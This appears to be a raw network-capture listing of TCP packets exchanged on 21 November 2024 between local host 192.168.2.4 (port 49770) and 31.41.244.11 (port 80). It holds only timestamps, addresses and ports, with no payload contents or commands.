                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.520737886 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.520806074 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.520853043 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.521769047 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.521816015 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.521899939 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.521946907 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.522820950 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.522866964 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.522912025 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.522985935 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.523915052 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.523972034 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.523972988 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.524023056 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.525022984 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.525075912 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.525119066 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.525177956 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.526093006 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.526185036 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.526196957 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.526241064 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.527168036 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.527237892 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.527416945 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.527468920 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.528316975 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.528377056 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.528409004 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.528458118 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.529371977 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.529433012 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.529469013 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.529520035 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.530424118 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.530503988 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.530550003 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.530600071 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.531553984 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.531610012 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.531644106 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.531696081 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.532579899 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.532639980 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.686139107 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.686208010 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.686245918 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.686288118 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.686547995 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.686602116 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.686629057 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.686680079 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.687644005 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.687697887 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.687828064 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.687880993 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.688724995 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.688812017 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.688821077 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.688863993 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.689821959 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.689893007 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.689937115 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.689989090 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.690939903 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.691000938 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.691051006 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.691099882 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.692008018 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.692064047 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.692116976 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.692162037 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.693095922 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.693154097 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.693196058 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.693242073 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.694154978 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.694207907 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.694263935 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.694314003 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.695276022 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.695319891 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.695394039 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.695440054 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.696372032 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.696422100 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.696511030 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.696559906 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.697457075 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.697504997 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.697549105 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.697601080 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.698574066 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.698632956 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.698635101 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.698678970 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.699619055 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.699666023 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.699668884 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.699711084 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.700767994 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.700824022 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.700926065 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.700974941 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.701796055 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.701884031 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.701920986 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.701968908 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.702892065 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.702940941 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.703043938 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.703087091 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.704040051 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.704088926 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.704183102 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.704237938 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.705073118 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.705115080 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.705202103 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.705248117 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.706162930 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.706212044 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.706274033 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.706321955 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.707246065 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.707294941 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.707405090 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.707453966 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.708333969 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.708383083 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.708434105 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.708481073 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.709433079 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.709481955 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.709534883 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.709583044 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.710565090 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.710638046 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.710639000 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.710686922 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.711606979 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.711657047 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.711761951 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.711812973 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.712733030 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.712781906 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.712820053 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.712866068 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.713870049 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.713928938 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.713973045 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.714024067 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.714859962 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.714932919 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.714971066 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.715015888 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.715976000 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.716028929 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.716073036 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.716125011 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.717050076 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.717099905 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.717144012 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.717194080 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.718193054 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.718242884 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.718255997 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.718303919 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.719216108 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.719264984 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.719310999 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.719372988 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.720341921 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.720412970 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.720455885 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.720508099 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.721501112 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.721558094 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.721637964 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.721713066 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.722580910 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.722636938 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.722721100 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.722770929 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.723578930 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.723633051 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.723685026 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.723733902 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.724656105 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.724704981 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.724740028 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.724786997 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.725766897 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.725817919 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.725904942 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.725955009 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.726840019 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.726901054 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.726963043 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.727014065 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.727931976 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.727986097 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.728035927 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.728086948 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.729017019 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.729072094 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.729132891 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.729180098 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.730189085 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.730237007 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.730266094 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.730312109 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.731220961 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.731272936 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.731275082 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.731328964 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.732285976 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.732331038 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.732372999 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.732422113 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.733388901 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.733453035 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.733486891 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.733536959 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.734455109 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.734507084 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.734560013 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.734611988 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.735565901 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.735610008 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.735654116 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.735708952 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.736648083 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.736695051 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.736747026 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.736793041 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.737757921 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.737895966 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.737909079 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.737957001 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.738912106 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.738964081 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.739090919 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.739140034 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.739912987 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.739981890 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.740010977 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.740061045 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.740995884 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.741063118 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.741116047 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.742100954 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.742208958 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.742214918 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.742253065 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.743204117 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.743247032 CET4977080192.168.2.431.41.244.11
